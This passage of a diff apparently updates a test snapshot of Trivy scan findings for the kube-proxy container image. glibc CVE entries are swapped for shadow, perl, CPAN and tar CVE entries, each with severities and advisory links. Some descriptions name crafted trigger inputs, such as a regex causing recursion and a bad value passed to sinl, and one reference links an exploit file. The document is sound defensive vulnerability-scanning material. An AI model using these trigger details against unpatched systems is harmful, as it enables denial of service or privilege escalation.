"https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "description": "CPAN 2.28 allows Signature Verification Bypass.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://github.com/andk/cpanpm/pull/175", + }, + { + "type": "URL", + "value": "https://metacpan.org/dist/CPAN/changes", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6112-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6112-2", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, ], "severity": "LOW", @@ -155459,57 +156045,67 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + }, + { + "type": "URL", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], "severity": "LOW", @@ -155517,62 +156113,47 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, ], "severity": "LOW", @@ -155580,692 +156161,599 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": 